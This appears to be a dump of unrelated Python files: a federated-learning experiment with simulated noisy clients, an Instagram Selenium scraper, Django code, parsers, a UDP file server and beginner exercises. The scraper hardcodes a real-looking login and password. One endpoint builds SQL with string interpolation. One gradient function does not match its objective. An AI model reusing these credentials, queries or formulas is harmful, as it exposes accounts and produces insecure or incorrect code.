def local_update(args):
client=args[0]
epoch=args[1]
client.local_update(epoch=epoch)
def main(cfg_path):
logger.debug(f"load config : {cfg_path}")
cfg = load_conf(cfg_path)
logger.debug('\n' + OmegaConf.to_yaml(cfg))
logger.debug(f"set seed : {cfg.seed}")
seed_everything(cfg.seed)
exp_name = os.path.splitext(os.path.basename(__file__))[0]
timestamp = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
logdir = os.path.join("../logs/", exp_name)
os.makedirs(logdir, exist_ok=True)
logdir = os.path.join(logdir, timestamp)
os.makedirs(logdir, exist_ok=True)
logger.debug(f"make log directory : {logdir}")
logger.add(os.path.join(logdir, "log.txt"), level="DEBUG")
writer = tbx.SummaryWriter(logdir)
with open(os.path.join(logdir, "config.yaml"), 'w') as f:
yaml.dump(dict(cfg), f)
logger.debug(f"setup dataset")
train_img, train_label, val_img, val_label, img_channel = setup_dataset(cfg)
logger.debug(f"setup client")
clients = setup_client(cfg, train_img, train_label, img_channel)
logger.debug(f"num of client : {len(clients)}")
n_noise = cfg.n_noise
logger.debug(f"The number of Noise Client is {n_noise}.")
faild_label_pair = np.array([6, 7, 5, 8, 9, 2, 0, 1, 3, 4]) # ノイズクライアントの誤りペア
for i in range(n_noise):
if cfg.adv == 'zero':
clients[i].dataloader.dataset.labels = np.zeros_like(clients[i].dataloader.dataset.labels)
elif cfg.adv == 'rand':
clients[i].dataloader.dataset.labels = np.random.randint(0, 10, clients[i].dataloader.dataset.labels.shape)
elif cfg.adv == 'flip':
clients[i].dataloader.dataset.labels = faild_label_pair[clients[i].dataloader.dataset.labels]
elif cfg.adv == 'prand':
percentage = np.random.rand() # ノイズの割合
n_noise_data = int(percentage * len(clients[i].dataloader.dataset.labels))
noise_index = np.random.choice(np.arange(len(clients[i].dataloader.dataset.labels)), n_noise_data, replace=False)
clients[i].dataloader.dataset.labels[noise_index] = np.random.randint(0, 10, clients[i].dataloader.dataset.labels[noise_index].shape)
logger.debug(f"setup server")
# -- server setup --
val_dataloader = DataLoader(
MnistDataset(val_img, val_label, 32),
batch_size=cfg.batch_size,
num_workers=cfg.num_workers,
)
server = GNCFL(
model=deepcopy(clients[0].model),
clients=clients,
criterion=torch.nn.CrossEntropyLoss(),
dataloader=val_dataloader)
history = np.zeros((cfg.n_rounds, 5)) # loss, accuracy, xsim, n_bengin, n_adv
logger.debug("start training")
logger.debug(f"| {'step':^10} | {'loss':^12} | {'accuracy':^12} | {'lr':^12} | {'xsim':^8} | {'bengin':^6} | {'adv':^6}")
# analysis
similarity_matrix = np.zeros((cfg.n_rounds, len(clients), len(clients)))
if cfg.adv == 'clean':
server.benign = np.arange(n_noise, 100)
server.adv = np.arange(n_noise)
if cfg.alpha_scheduler == "linear":
alpha_scheduler = LinearAlphaScheduler(cfg.alpha, cfg.linear_epoch)
elif cfg.alpha_scheduler == 'cos':
alpha_scheduler = CosAlphaScheduler(cfg.alpha, cfg.cos_cycle)
else:
alpha_scheduler = StaticAlphaScheduler(cfg.alpha)
for t in range(cfg.n_rounds):
alpha_scheduler.step()
samples = [client for client in clients]
# send parameter from server to client
for client in samples:
client.model.load_state_dict(server.model.state_dict())
# device: CPU -> GPU
for client in samples:
client.to(cfg.device)
# local update
if cfg.parallel:
with mp.Pool(min(cfg.threads, mp.cpu_count())) as p:
with tqdm(total=len(samples), leave=False) as tq:
for _ in p.imap_unordered(local_update, zip(samples,[cfg.local_epoch] * len(samples))):
tq.update(1)
else:
for client in tqdm(samples, leave=False):
client.local_update(epoch=cfg.local_epoch)
# device: GPU -> CPU
for client in samples:
client.to("cpu")
xsim, simmat, cls1, cls2 = server.clustering(thresh=cfg.thresh, alpha=alpha_scheduler.alpha)
similarity_matrix[t] = simmat
n_benign = len(server.benign)
n_adv = len(server.adv)
server.aggregate()
server.to(cfg.device)
loss, accuracy = server.eval()
server.to("cpu")
lr = get_lr(clients[0].optimizer)
# log_param
writer.add_scalar('loss', loss, t)
writer.add_scalar('accuracy', accuracy, t)
history[t, 0] = loss
history[t, 1] = accuracy
history[t, 2] = xsim
history[t, 3] = n_benign
history[t, 4] = n_adv
logger.debug(f"| {t:>10} | {round(loss, 7):>12} | {round(accuracy, 7):>12} | {round(lr, 7):>12} | {round(xsim, 5):>8} | {n_benign:>6} | {n_adv:>6}")
np.save(os.path.join(logdir, 'history.npy'), history)
np.save(os.path.join(logdir, 'simmat.npy'), similarity_matrix)
if __name__ == "__main__":
try:
mp.set_start_method('spawn')
cfg_path = "../config/gncfl_mnist.yaml"
main(cfg_path)
except Exception as e:
logger.error(traceback.format_exc()) |
from selenium import webdriver
import time
# 크롬창(웹드라이버) 열기
driver = webdriver.Chrome("./chromedriver")
# ootd 태그 검색결과 페이지 접속
driver.get("https://www.instagram.com/explore/tags/ootd/")
log = driver.find_element_by_css_selector("button.sqdOP")
log.click()
time.sleep(1)
box = driver.find_elements_by_css_selector("input._2hvTZ")
box[0].send_keys("ijieun403")
box[1].send_keys("jieunlee308^^")
login = driver.find_element_by_css_selector("button.sqdOP.L3NKy")
login.click()
# 컨테이너(포스트) 12개 저장
instagram = driver.find_elements_by_css_selector("div.v1Nh3")
instagram = instagram[:12]
# 컨테이너 반복하기
for insta in instagram:
# 포스트 클릭하기
insta.click()
# 시간 지연
time.sleep(1)
# 본문 선택 후 출력
post = driver.find_element_by_css_selector("div.C4VMK span").text
print(post)
# 닫기 버튼 클릭
but_close = driver.find_element_by_css_selector("button.ckWGn")
but_close.click() |
# Generated by Django 2.2.4 on 2019-09-29 02:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('job', '0021_auto_20190927_2030'),
]
operations = [
migrations.AlterField(
model_name='jobopening',
name='company_email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
]
|
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
def display(x,indx):
star = "************************\n"
dash = "----------"
print star + "=>>" + str(indx) + ".iteration\n" + star + "x:\n" + dash
print x
print dash + "\nf(x):\n" + dash + "\n" +str(f(x)) + "\n" + dash + "\nGradF:\n" + dash
print gradF(x)
def gradF(x):
grad = np.empty([2,1], dtype=float)
grad[0] = (-400*x[0]*(x[1]-(x[0]**2))) - 2*(1-x[0])
grad[1] = (200*(x[1]-(x[0]**2)))
return grad
def iterF(inVect):
currentX = inVect
k = 0
for k in range(25001):
if (k%100 == 0):
display(currentX,k)
prevX = currentX
currentX += (-1 * alpha) * gradF(prevX).reshape(2)
funcValue = abs(f(currentX) - f(prevX))
if (np.linalg.norm(currentX)<eps2) and (funcValue <= eps1):
break
return currentX
if __name__ == '__main__':
alpha = 0.001
eps1 = 1e-18
eps2 = 1e-4
f = lambda x : (100.0*((x[0]-(x[1]**2))**2)) - (1.0-(x[0])**2)
inX = np.array([1.2,1.2],dtype=np.double)
locMin = iterF(inX)
print "----------\nLocal minimizer of function is \n", locMin
axes = plt.gca()
axes.set_xlim([-0.1,5])
axes.set_ylim([-0.1,5])
ax = plt.axes()
ax.arrow(0, 0, locMin[0], locMin[1], head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.show()
|
import socket
import time
import multiprocessing
from concurrent.futures import ProcessPoolExecutor as Pool
from Packet import create_packet, decode_header, Packet
from Constants import SERVER_PORT, CHUNK_SIZE, DATA_SIZE, SERVER_ADDRESS, HEADER_SIZE, WINDOW_SIZE, SEND_TIMEOUT, FINACK_WAIT
from pathlib import Path
import math
def send_with_timeout(s, data, address, left_seq, seq_no, acked):
# print(f'SENDING...{decode_header(data[:HEADER_SIZE]).seq_no, data[HEADER_SIZE:]}')
s.sendto(data, address)
while not acked[seq_no]:
time.sleep(0.1)
def send_chunk(s, data, address, seq_no, left_seq, acked):
while not acked[seq_no]:
ptimeout = multiprocessing.Process(target=send_with_timeout, args=(s, data, address, left_seq, seq_no, acked))
ptimeout.start()
ptimeout.join(SEND_TIMEOUT)
ptimeout.terminate()
def receive(s, left_seq, acked):
while True:
header, _ = s.recvfrom(CHUNK_SIZE)
header = decode_header(header[:HEADER_SIZE])
if header.pkt_type == Packet.ACK:
# print(f'Received: {header.seq_no}')
acked[header.seq_no] = True
left_seq[0] += 1
def finack_wait(ss, recv_fin):
header, address = ss.recvfrom(CHUNK_SIZE)
header = decode_header(header[:HEADER_SIZE])
if header.pkt_type == Packet.ACK:
recv_fin[0] = True
def send_file(ss, left_seq, acks):
# Wait for a SYN packet
header, address = ss.recvfrom(CHUNK_SIZE)
header = decode_header(header[:HEADER_SIZE])
if header.pkt_type == Packet.SYN:
packets = []
# Start sending packets asynchronously, upper bounded by window size (max pool size)
with open('File.txt', 'rb') as file:
s_no = 0
while True:
chunk = file.read(DATA_SIZE)
if not chunk:
break
packet = create_packet(data=chunk, seq_no=s_no)
packets.append(packet)
s_no += 1
rproc = multiprocessing.Process(target=receive, args=(ss, left_seq, acks))
rproc.start()
with Pool(max_workers=WINDOW_SIZE) as send_pool:
for i, packet in enumerate(packets):
time.sleep(0.05)
send_pool.submit(send_chunk, ss, packet, address, i, left_seq, acks)
while left_seq[0] < len(packets):
time.sleep(0.1)
rproc.terminate()
i = 0
# Handle FINACK
while True:
i += 1
fin_packet = create_packet(Packet.FIN)
ss.sendto(fin_packet, address)
recv_finack = multiprocessing.Manager().list()
recv_finack.append(False)
pfinack = multiprocessing.Process(target=finack_wait, args=(ss, recv_finack))
pfinack.start()
pfinack.join(FINACK_WAIT)
pfinack.terminate()
if recv_finack[0] or i > 20:
break
return
if __name__ == '__main__':
serversocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
serversocket.bind((SERVER_ADDRESS, SERVER_PORT))
manager = multiprocessing.Manager()
left_seq_no = manager.list()
left_seq_no.append(0)
window_acks = manager.list()
window_acks += [False for _ in range(math.ceil(Path('File.txt').stat().st_size / DATA_SIZE))]
# Start process for sending file
psend = multiprocessing.Process(target=send_file, args=(serversocket, left_seq_no, window_acks))
psend.start()
psend.join()
psend.terminate()
serversocket.close()
|
import random
name=input('Enter your name?')
print("Hello, "+name+" Time to play Hangman!!")
# create a variable to set secret
word="secret"
# create a variable with empty value
guesses=''
# determine the number of turns
turns=10
while turns>0:
failed=0
for char in word:
if char in guesses:
print(char,end=' ')
else:
print("_",end=' ')
failed+=1
if failed==0:
print("Congratulations ",name," You Won !!")
break
guess=input('Guess your character: ')
guesses+=guess
if guess not in word:
turns-=1
print("Your guess is wrong")
print('you have ',turns,' more turns')
if turns==0:
print("Oops ",name,' You loose !!')
|
import django_filters.rest_framework
from django import shortcuts
from rest_framework import filters
from rest_framework import permissions
from rest_framework import response
from rest_framework import viewsets
import shop.models
import shop.permissions
import shop.serializers
class CategoryViewSet(viewsets.ReadOnlyModelViewSet):
queryset = shop.models.Category.objects.all()
serializer_class = shop.serializers.CategorySerializer
class ItemViewSet(viewsets.ModelViewSet):
queryset = shop.models.Item.objects.all()
serializer_class = shop.serializers.ItemSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly,
shop.permissions.IsOwnerOrReadOnly]
filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
filterset_fields = ('owner__username', 'category',)
ordering_fields = ('price', 'number_of_views', 'created_at',)
# def list(self, request, *args, **kwargs):
# """
# increases number_of_views counter each time all items are loaded
# """
# self.queryset.update(number_of_views=models.F('number_of_views') + 1)
# serializer = shop.serializers.ItemSerializer(self.queryset, many=True)
# return response.Response(serializer.data)
def retrieve(self, request, *args, **kwargs):
item = shortcuts.get_object_or_404(shop.models.Item.objects.all(), pk=kwargs['pk'])
item.number_of_views += 1
item.save()
serializer = shop.serializers.ItemSerializer(item)
return response.Response(serializer.data)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
|
"""记录一些算法题"""
from typing import List
from queue import Queue
def numIslands(grid: List[List[str]]) -> int:
"""广度(宽度)优先搜索-bfs"""
if not grid:
return 0
direct_coors = [(0, -1), (-1, 0), (0, 1), (1, 0)] # 四个方位offset
index = 1 # 岛屿ID
q = Queue()
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == "1":
index += 1
print("index value: {}".format(index))
grid[i][j] = index # 已经搜索过的位置置0
q.put((i, j)) # 入列
while True:
if q.empty():
break
cur = q.get() # 元素出列
for offset in direct_coors:
# 四个方向广度优先搜索
row, col = cur[0] + offset[0], cur[1] + offset[1]
if (row < 0 or row >= len(grid)
or col < 0 or col >= len(grid[0])):
continue
if grid[row][col] == "1":
q.put((row, col))
grid[row][col] = str(index) # 近邻周围值设置为index
return index - 1
def numIslands_dfs(grid: List[List[str]]) -> int:
"""深度优先搜索---dfs"""
if not grid:
return 0
index = 1
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == "1":
index += 1
dfs(grid, i, j, index)
return index - 1
def dfs(grid, row, col, index):
"""四个方向深度搜索---dfs"""
if (row < 0 or row >= len(grid) or
col < 0 or col >= len(grid[0]) or
grid[row][col] != "1"):
return
grid[row][col] = str(index) # 当前位置已经被访问, 置index
# 四个方向DFS
dfs(grid, row, col - 1, index)
dfs(grid, row - 1, col, index)
dfs(grid, row, col + 1, index)
dfs(grid, row + 1, col, index)
if __name__ == '__main__':
arr = [["1","1","0","0","0"],
["1","1","0","0","0"],
["0","0","1","0","0"],
["0","0","0","1","1"]]
result = numIslands_dfs(arr)
print(result)
|
# Generated by Django 3.1.5 on 2021-01-06 19:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Nursery_API', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Nursery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40, unique=True)),
('location', models.CharField(max_length=40)),
],
),
migrations.CreateModel(
name='UserPlant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nursery_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.nursery')),
],
),
migrations.RemoveField(
model_name='plants',
name='name',
),
migrations.AddField(
model_name='plants',
name='plant_name',
field=models.CharField(default='Not', max_length=40, unique=True),
preserve_default=False,
),
migrations.CreateModel(
name='Users',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=20, unique=True)),
('last_name', models.CharField(max_length=20)),
('age', models.IntegerField(default=18)),
('plant_name', models.ManyToManyField(through='Nursery_API.UserPlant', to='Nursery_API.Plants')),
],
),
migrations.AddField(
model_name='userplant',
name='plant_name',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.plants'),
),
migrations.AddField(
model_name='userplant',
name='user_name',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.users'),
),
migrations.CreateModel(
name='NurseryPlant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nursery_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.nursery')),
('plant_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.plants')),
],
),
migrations.AddField(
model_name='nursery',
name='Plant_name',
field=models.ManyToManyField(through='Nursery_API.NurseryPlant', to='Nursery_API.Plants'),
),
]
|
class Inference(object):
def __init__(self, edge=None, matches=(), variables={}):
self.edge = edge
self.matches = matches
self.variables = variables
def __add__(self, other):
edge = other.edge if self.edge is None else self.edge
matches = self.matches + other.matches
variables = {**self.variables, **other.variables}
return Inference(edge=edge, matches=matches, variables=variables)
def is_rule(edge):
if edge.is_atom():
return False
if len(edge) != 3:
return False
if edge[0].to_str() != ':-':
return False
if edge[1].is_atom() or edge[2].is_atom():
return False
return True
def match_premises(hg, premises, inference):
if len(premises) == 0:
yield inference
else:
for inference_i in match_premise(hg, premises[0], inference.variables):
for inference_j in match_premises(hg, premises[1:], inference_i):
yield inference + inference_j
def match_premise(hg, premise, curvars={}):
if premise[0].to_str() == 'and':
for inference in match_premises(hg, premise[1:], Inference()):
yield inference
else:
pattern = premise.apply_vars(curvars)
for edge, results in hg.match(pattern):
for result in results:
yield Inference(
matches=((premise, edge),),
variables={**curvars, **result})
def eval_rule(hg, rule):
if not is_rule(rule):
raise RuntimeError('Not a valid rule: {}'.format(rule.to_str()))
for inference in match_premise(hg, rule[2]):
inference.edge = rule[1].apply_vars(inference.variables)
yield inference
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 18 19:44:46 2021
@author: DWI PRAMONO
"""
#Buat program untuk menampilakan dan menghitung biaya total Bengkel UD. Matahari
#1. set variabel merk, jumlah, harga, subtotawal, subtotakhir, diskon, ppn, total
#2. input pilihan merk oli dan harga
#3. input jumlah
#4. subtotawal = harga * jumlah
#5. jika subtotalawal > 200000 maka mendapat diskon 5%
#6. diskon = subtotalawal * 0.05
#7. subtotakhir = subtotawal - diskon
#8. semua transaksi dikenakan ppn 1%
#10. ppn = subtotakhir * 0.01
#11. total = subtotakhir - ppn
#12. tampilkan merk, harga, subtotakhir, diskon, ppn, total
ulang = "y"
while ulang=="y" or ulang=="Y":
print ("===========================================")
print (" BENGKEL MOTOR UD. MATAHARI ")
print ("===========================================")
print ("")
print (" List Merk Oli")
print ("-------------------------------------------")
print (" A. Duration SW20 1L")
print (" B. Castrol Magnatec 1L")
print (" C. Federal Supreme XX 1L")
print (" D. Yamalube 1L")
print (" E. Shell 1L")
print ("-------------------------------------------")
merk = ['Duration SW20 1L','Castrol Magnatec 1L','Federal Supreme XX 1L','Yamalube 1L','Shell 1L','-']
harga = [53000,50000,54000,45000,46000,0]
pilihan = input(" Masukkan list abjad Merk Oli = ")
print ("-------------------------------------------")
#identifikasi pilihan
if pilihan=="a":
idx = 0
elif pilihan=="b":
idx = 1
elif pilihan=="c":
idx = 2
elif pilihan=="d":
idx = 3
elif pilihan=="e":
idx = 4
else:
idx = 5
pesan = " !!! Masukkan Sesuai List yang ada !!!"
print (pesan)
print("")
jumlah = int(input(" Jumlah = "))
#cetak tampilan layar
print(" Merk Oli = " + merk[idx])
print(" Harga = Rp." + str(harga[idx]))
#hitung transksi
fixharga = harga[idx]
subtotawal = fixharga * jumlah
if subtotawal > 200000:
diskon = subtotawal * 0.05
else:
diskon = 0
subtotakhir = subtotawal - diskon
ppn = subtotakhir * 0.01
total = subtotakhir - ppn
print(" diskon = Rp." + str(diskon))
#tampilkan total ongkir
print("-------------------------------------------")
print(" Subtotal = Rp." + str(subtotakhir))
print('-------------------------------------------')
print("")
print(" PPN = Rp." + str(ppn))
print("")
print("-------------------------------------------")
print(" TOTAL = Rp." + str(total))
print("")
print("===========================================")
print(" TERIMA KASIH")
print("===========================================")
jawab = input (" ULANGI PROGRAM ? Y/T = ")
if jawab == "t" or jawab =="T":
break |
import TreeNode
def sortedArrayToBST(num):
|
import calendar
import logging
from collections import defaultdict
from datetime import datetime
import lxml.html
from dateutil.parser import parse
from pyquery import PyQuery as pq
logger = logging.getLogger()
class AnimeParser:
def __init__(self, url, html):
self._url = url
self._html = html
if html:
self._pq = pq(html)
self._tree = lxml.html.fromstring(html)
self.fields = {
'aired_from_to': self.get_aired_from_to,
'duration': self.get_duration,
'episodes': self.get_episodes,
'english': self.get_english,
'favorites': self.get_favorites,
'image': self.get_image,
'id': self.get_id,
'genres': self.get_genres,
'japanese': self.get_japanese,
'members': self.get_members,
'members_score': self.get_score,
'producers': self.get_producers,
'related': self.get_related,
'rating': self.get_rating,
'synopsis': self.get_synopsis,
'status': self.get_status,
'synonyms': self.get_synonyms,
'scores': self.get_scored,
'title': self.get_title,
'type': self.get_type,
}
def parse(self):
return self.get_all_fields_dict()
def get_all_fields_dict(self):
res = {}
if self._html:
for name, func in self.fields.items():
try:
res[name] = func()
except (ValueError, IndexError) as e:
logger.error('parsing error {} ({}) for field {}'.format(e, self._url, name))
else:
res['id'] = self.get_id()
return res
def get_id(self):
return int(self._url.split('/')[-1])
def get_aired_from_to(self):
aired_from_to = self.get_aired()
if aired_from_to == 'Not available':
return None, None
aired_split = aired_from_to.split('to')
default_date = datetime.today().replace(month=1, day=1)
aired_from = calendar.timegm(parse(aired_split[0].strip(), fuzzy=True, default=default_date).utctimetuple())
if len(aired_split) > 1:
if aired_split[1].strip() == '?':
aired_to = None
else:
aired_to = calendar.timegm(parse(aired_split[1].strip(), fuzzy=True, default=default_date).utctimetuple())
else:
aired_to = aired_from
return aired_from, aired_to
def parse_duration_time(self, time_str):
hr = 0
hr_split = time_str.split('hr.')
if len(hr_split) > 1:
hr = int(hr_split[0].strip())
time_str = hr_split[1]
min_split = time_str.split('min.')
minutes = int(min_split[0].strip()) if len(min_split) > 1 else 0
return hr*60 + minutes
def get_related(self):
result = defaultdict(list)
for tr in self._pq('.anime_detail_related_anime tr').items():
related = tr('td:first').text().lower()[:-1]
for link in tr('a').items():
related_url = link.attr['href']
related_type, str_id = related_url.split('/')[1:3]
if str_id:
result[related].append({'t': related_type, 'i': int(str_id)})
return result
def get_title(self):
return self._tree.xpath('//h1/span/text()')[0].strip()
def get_type(self):
type_node = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Type:"]/../a/text()')
if type_node:
return type_node[0]
else:
type_node = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Type:"]/../text()')[1]
return type_node.strip()
def get_image(self):
img = self._tree.xpath('//*[@id="content"]/table/tr/td[1]/div/div[1]/a/img')
return img[0].attrib['src'] if img else None
def get_episodes(self):
episodes = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Episodes:"]')[0].tail.strip()
if episodes and episodes != 'Unknown':
episodes = int(episodes)
else:
episodes = None
return episodes
def get_status(self):
return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Status:"]')[0].tail.strip()
def get_rating(self):
return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Rating:"]')[0].tail.strip()
def get_english(self):
xpath_result = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="English:"]')
if xpath_result:
return xpath_result[0].tail.strip()
def get_synonyms(self):
xpath_result = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Synonyms:"]')
if xpath_result:
return xpath_result[0].tail.strip()
def get_japanese(self):
xpath_result = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Japanese:"]')
if xpath_result:
return xpath_result[0].tail.strip()
def get_members(self):
text = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Members:"]')[0].tail
return int(text.replace(',', '').strip())
def get_favorites(self):
text = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Favorites:"]')[0].tail
return int(text.replace(',', '').strip())
def get_scored(self):
members = self._pq('[itemprop="ratingCount"]').text().replace(',', '')
if not members:
scored_str = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../small')
members = scored_str[0].text.split()[-2] if scored_str else ''
if not members:
span = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../span[3]/text()')
members = span[0] if span else ''
return int(members)
def get_score(self):
score = self._pq('[itemprop="ratingValue"]').text()
if not score:
score_str = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../text()')
score = score_str[0].strip() if score_str else ''
if not score:
span = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../span[2]/text()')
score = span[0] if span else ''
return float(score) if score != 'N/A' else None
def get_duration(self):
duration_str = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Duration:"]')[0].tail.strip()
if duration_str != 'Unknown':
duration = self.parse_duration_time(duration_str)
else:
duration = None
return duration
def get_aired(self):
return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Aired:"]')[0].tail.strip()
def get_synopsis(self):
description = self._pq('[itemprop="description"]').text()
description = description or self._pq('h2:contains("Synopsis")')[0].tail
if description and 'No synopsis information has been added to this title' in description:
description = ''
return description
def get_genres(self):
raw_genres = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Genres:"]/../a/text()')
empty_genres = 'add some'
if raw_genres and empty_genres in raw_genres:
raw_genres.remove(empty_genres)
return raw_genres
def get_producers(self):
return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Producers:"]/../a/text()')
|
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
return render(request,'shop/homepage.html') |
from carbon_black.endpoints.base_endpoint import Endpoint
from shared.models import SEC as SEC_Model, SEC_Company_Info, SEC_Employee_Stock, SEC_Merger, SEC_Secondary_Offering
from datetime import datetime
from json import loads as json_loads
class SEC(Endpoint):
def __init__(self) -> None:
super().__init__()
self.api_endpoint = None
return
def get(self, api_endpoint: str, transaction_id: int) -> dict:
try:
self.api_endpoint = api_endpoint
results = self.query(
api_endpoint, f"SELECT * FROM SEC WHERE transaction_id = {transaction_id};")
return self.make_sec_model(results)
except Exception as err:
return {
'error': {
'sec': str(repr(err))
}
}
def make_sec_model(self, sql_results: list):
all_results = []
for item in sql_results:
model = SEC_Model()
model.data['sec_id'] = item[0]
model.data['transaction_id'] = item[1]
model.data['date_of_ipo'] = item[2].strftime(
'%Y-%m-%d') if item[2] else None
model.data['late_filings'] = item[3]
model.data['ct_orders'] = item[4]
model.data['is_adr'] = bool(item[5])
model.data['company_info'] = self.make_company_info(item[0])
model.data['secondary_offerings'] = self.make_secondary_offering(
item[0])
model.data['mergers'] = self.make_mergers(item[0])
model.data['stock_program'] = self.make_stock_program(item[0])
all_results.append(model.data)
return all_results
def make_secondary_offering(self, sec_id: int) -> list:
all_results = []
results = self.query(
self.api_endpoint, f"SELECT * FROM SEC_Secondary_Offering WHERE sec_id = {sec_id};")
for item in results:
model = SEC_Secondary_Offering()
model.data['sec_secondary_offering_id'] = item[0]
model.data['sec_id'] = item[1]
model.data['date'] = item[2].strftime(
'%Y-%m-%d') if item[2] else None
model.data['additional_shares_issued'] = item[3]
model.data['is_asr'] = bool(item[4])
model.data['link'] = item[5]
all_results.append(model.data)
return all_results
def make_company_info(self, sec_id: int) -> list:
all_results = []
results = self.query(
self.api_endpoint, f"SELECT * FROM SEC_Company_Info WHERE sec_id = {sec_id};")
for item in results:
model = SEC_Company_Info()
model.data['sec_company_info_id'] = item[0]
model.data['sec_id'] = item[1]
model.data['date'] = item[2].strftime(
'%Y-%m-%d') if item[2] else None
model.data['link'] = item[3]
model.data['item_list'] = json_loads(item[4])
all_results.append(model.data)
return all_results
def make_mergers(self, sec_id: int) -> list:
all_results = []
results = self.query(
self.api_endpoint, f"SELECT * FROM SEC_Merger WHERE sec_id = {sec_id};")
for item in results:
model = SEC_Merger()
model.data['sec_merger_id'] = item[0]
model.data['sec_id'] = item[1]
model.data['date'] = item[2].strftime(
'%Y-%m-%d') if item[2] else None
model.data['merging_with_company'] = item[3]
model.data['merging_with_cik'] = item[4]
all_results.append(model.data)
return all_results
def make_stock_program(self, sec_id: int) -> list:
all_results = []
results = self.query(
self.api_endpoint, f"SELECT * FROM SEC_Employee_Stock WHERE sec_id = {sec_id};")
for item in results:
model = SEC_Secondary_Offering()
model.data['sec_employee_stock_id'] = item[0]
model.data['sec_id'] = item[1]
model.data['date'] = item[2].strftime(
'%Y-%m-%d') if item[2] else None
model.data['additional_shares_issued'] = item[3]
model.data['link'] = item[4]
all_results.append(model.data)
return all_results
|
import re
import tokenizer
from feature_extractor_counts import FeatureExtractorCounts
from ..preprocessing import data_splitting as ds
from ..util import defines
from ..util import file_handling as fh
class FeatureExtractorCountsBrownClusters(FeatureExtractorCounts):
def __init__(self, test_fold=0, dev_subfold=None, binarize=False, clusters=''):
#print "Creating from arguments"
name = 'brownclusters'
prefix = '_bc-' + clusters + '_'
FeatureExtractorCounts.__init__(self, name, prefix, add_oov=True,
min_doc_threshold=1,
binarize=binarize,
test_fold=test_fold,
dev_subfold=dev_subfold)
self.params['clusters'] = clusters
FeatureExtractorCountsBrownClusters.extend_dirname(self)
def extend_dirname(self):
self.dirname = self.dirname + ',' + self.params['clusters']
def get_dirname(self):
return self.dirname
def get_full_name(self):
return fh.get_basename(self.dirname)
def extract_features(self, write_to_file=True):
print "Extracting ngram tokens:"
if self.get_dev_subfold() is None:
dev = 0
train, dev, test = ds.get_all_splits(test_fold=self.get_test_fold(),
dev_subfold=self.get_dev_subfold())
train = train + dev
else:
train, dev, test = ds.get_all_splits(test_fold=self.get_test_fold(),
dev_subfold=self.get_dev_subfold())
all_items = train + dev + test
responses = fh.read_json(defines.data_normalized_text_file)
cluster_filename = fh.make_filename(defines.resources_clusters_dir, self.params['clusters'], 'json')
cluster_dict = fh.read_json(cluster_filename)['index']
label_files = fh.get_label_files()
tokens = {}
for f in label_files:
print f
self.extract_tokens_from_file(responses, f, 1, cluster_dict, tokens)
vocab = self.make_vocabulary(tokens, all_items)
feature_counts, oov_counts = self.extract_feature_counts(all_items, tokens, vocab)
if write_to_file:
vocab.write_to_file(self.get_vocab_filename())
fh.write_to_json(all_items, self.get_index_filename(), sort_keys=False)
fh.pickle_data(feature_counts, self.get_feature_filename())
fh.write_to_json(oov_counts, self.get_oov_count_filename(), sort_keys=False)
self.feature_counts = feature_counts
self.index = all_items
self.vocab = vocab
self.oov_counts = oov_counts
def extract_tokens_from_file(self, responses, input_filename, n, cluster_dict, token_dict):
Y = fh.read_csv(input_filename)
rids = Y.index
for rid in rids:
text = responses[rid].lower()
text = text.lstrip()
text = text.rstrip()
tokens = []
sentences = tokenizer.split_sentences(text)
for s in sentences:
sent_tokens = tokenizer.make_ngrams(s, n)
sent_tokens = [t.rstrip('`"\'') if re.search('[a-z]', t) else t for t in sent_tokens]
sent_tokens = [t.lstrip('`"\'') if re.search('[a-z]', t) else t for t in sent_tokens]
sent_tokens = sent_tokens + ['__ENDS__']
